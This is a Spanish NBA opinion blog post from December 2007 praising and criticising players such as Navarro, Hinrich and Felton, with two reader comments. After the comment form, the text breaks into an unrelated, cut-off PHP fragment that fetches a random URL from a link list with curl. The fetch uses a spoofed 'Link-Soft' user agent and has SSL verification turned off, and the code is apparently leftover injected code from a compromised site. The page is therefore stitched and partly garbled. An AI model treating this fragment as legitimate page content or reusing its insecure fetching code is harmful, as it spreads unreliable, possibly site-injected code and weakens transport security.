Acordes y desacuerdos (5 de diciembre)

05 de December de 2007 por txusma

La temporada avanza y es momento de actualizar nuestros acordes y desacuerdos. Esta vez contamos con Navarro, Richard Jefferson, Los Golden State Warriors, Raymond Felton y los Wolves, entre otros, en el diván.

Acordes

Juan Carlos Navarro ha sorprendido a propios y extraños y seguramente ni él esperaba este comienzo de temporada tan demoledor: El 16 de noviembre fue, con 28 puntos, el máximo anotador de su equipo y con 8 triples igualó el récord de Jason Kidd y Chris Duhon de más lanzamientos de 3 anotados por un rookie en un partido. Es el mejor en la estadística de triples anotados por 48 minutos y mantiene un porcentaje de 3 que lo sitúa entre los 25 mejores de la liga. ¡Grande NBArro!
Debido al mal inicio de Vince Carter ha tenido que ser Richard Jefferson el que se convirtiera en escudero de Jason Kidd y liderara los Nets. 25.4 puntos, 5 rebotes y 3 asistencias son las credenciales que presenta a los que siguen pensando que tan sólo es un producto de la factoría Kidd.
Golden State se ha recuperado de un nefasto inicio de campaña y con una racha de 6 partidos ganados consecutivos vuelven a meterse en la pomada de donde nunca deberían haber salido. El retorno de Stephen Jackson y la mejoría de Monta Ellis parecen ser las claves de este buen momento de forma.
Todos pedíamos minutos para él y aunque haya tenido que ser debido a la lesión de un compañero, por fin los ha tenido. Ha jugado en total 7 partidos como titular promediando 12 puntos y 10.7 asistencia por partido, demostrando que podría ser el base titular de más de la mitad de las franquicias de la NBA. Este verano Toronto tendrá que rascarse el bolsillo para mantenerlo.
New Orleans sigue dando espectáculo y consiguiendo resultados. Son cuartos en el salvaje oeste y sus jugadores están cuajando una temporada sensacional. Chris Paul roza los 20 puntos 10 asistencias, David West está en 18.5 puntos y 9 rebotes, Stojakovic es el jugador de la NBA que más triples anota por partido y encima con buenos porcentajes, Tyson Chandler está en 10 puntos, 10 rebotes… ¡Que el ritmo no pare!

Desacuerdos

Anotar 59 puntos y perder por 45 debería ser motivo más que suficiente para despedir a jugadores y equipo técnico de cualquier equipo. Mal que nos pese, una derrota de este calibre no puede ser achacada solamente al entrenador y por eso suspendemos de manera categórica a todos los integrantes de la franquicia de los New York Knicks. Lo sentimos por los aficionados de la gran manzana pero la caída libre continúa.
Kirk Hinrich simboliza todos los males de los Chicago Bulls: Su rendimiento ha caído en picado en todos y cada uno de los aspectos del juego. Este descenso coincide con el nuevo contrato que ha firmado con los Bulls por el cual percibe esta temporada 11 millones de dólares. ¿Cazo mix?
Raymond Felton está haciendo en general una temporada buena. Lejos de la mejora que se le presuponía pero correcta. Lo que no es de recibo es que un jugador titular de un equipo de la NBA, que parece estar llamado a ser uno de los bases del futuro promedie en los 2 partidos jugados en diciembre un 2 de 17 en tiros de campo y en total haya anotado 5 puntos, cogido 5 rebotes y dado 5 asistencias. Por el bien de Charlotte, Raymond espabila.
Vale que seas un equipo joven, vale que estés en pleno proceso de reconstrucción, vale que tengas rotación y que en general tu equipo sea algo flojo, pero la desgana y pasotismo que presentan en algunos tramos de los partidos es intolerable. Tan solo Al Jefferson se salva en un equipo mediocre, mediocre.
Los Clippers aparecen aquí pero más por mala suerte que por deméritos propios. Las lesiones de Elton Brand, Sam Cassell, Al Thornton y Shaun Livingston están trastocando la vida de la franquicia y los jugadores sanos suficiente tienen con mantener el tipo como lo están haciendo. La vida es dura si tu jugador franquicia se lesiona.

 

 

Comenta

2 comentarios a esta entrada

  1. Dantley dice:
    #1

    Lo de los Clippers es más mala suerte que otra cosa.

    En los desacuerdos el caso de Hinrich es bastante sangrante. Es una pena que un jugador que iba camino de convertirse en una base solvente para un equipo con futuro de campeón se haya convertido en un jugador tan mediocre. Si es por el contratazo la verdad es que dice poco de su profesionalidad

      Citar

  2. mirrorism dice:
    #2

    A la misma edad, las estadísticas de José Calderón y Steve Nash son por poco reflejos de cada uno, ¿estamos en la víspera de una nueva etapa de dominación de un base extranjero? Lo dudo, pero sin duda es merecedor de posición titular en la NBA y no me sorprendería si gana una posición de banquero en un futuro juego de estrellas.

    El líder y así el culpable de la mediocridad de los Bobcats debería de ser Jason Richardson por ser el mas veterano y según estrella de ese grupo.

    Ahora, Richardson me hace acordar a Steve Francis después de ser debilitado por el traspaso de Houston a Orlando—o mejor dicho por el traspaso de Cutino Mobley de Orlando a Los Angeles.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>